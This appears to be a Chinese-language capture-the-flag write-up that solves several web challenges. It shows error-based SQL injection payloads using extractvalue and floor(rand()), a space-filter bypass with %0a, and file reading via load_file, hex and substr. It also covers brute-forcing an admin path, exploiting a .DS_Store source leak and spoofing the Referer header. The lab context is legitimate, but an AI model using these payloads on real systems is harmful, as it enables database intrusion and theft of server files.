wordpress

爆破得到后台登陆路径phpmyadmin，然后用在博客里面找到的账号密码登陆，然后在数据库里找到flag

报错注入

注入语句的格式为http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(SQL语句))a from information_schema.tables group by a)b%23或者http://127.0.0.1/index.php?id=1 and extractvalue(1, concat(0x7e, (sql语句),0x7e))。这里union被过滤，所以用第二个。空格被过滤，但是可以用换行代替，换行的url编码为%0a

先构造http://103.238.227.13:10088/?id=1%0aand%0aextractvalue(1,concat(0x7e,(select%0a@@version),0x7e))试试能不能成功注入，报错显示可以。提示告诉我们需要查询文件，而且路径已经给了我们，所以需要用到load_file函数。load_file函数参数是十六进制或者是ASC编码，所以需要把路径转换为十六进制0x2F7661722F746573742F6B65795F312E706870，然后试试。

不能直接返回。那就试试用hex函数，返回十六进制的，由于extractvalue最多读取32位，显然32个并不能全部返回我们需要的，所以用substr函数一段一段的截取。http://103.238.227.13:10088/?id=1%0aand%0aextractvalue(1,concat(0x7e,substr(hex(load_file(0x2f7661722f746573742f6b65795 f312e706870))%0afrom%0a1%0afor%0a20),0x7e))，从1开始，一次截取20个，然后把内容放入hex  workspace解释为原文件。

得到flag

sql注入2

打开是个登陆页面，随便输个账号试试

画面是这样的。url没有我们熟悉的注入格式，源码里也没有什么有用的信息，感觉无从下手。那就扫一扫目录？用dirsearch扫一下是这样的

第一个是.DS_Store    典型的源码泄漏...... 然后下载一个ds_store_exp.py工具下载下来源码

直接访问就可以得到flag

你从哪里来

打开链接之后，页面询问是否来自google，那就抓包改referer，我尝试了 https://www.google.com.hk/   http://www.google.com/最后才发现原来是https://www.google.com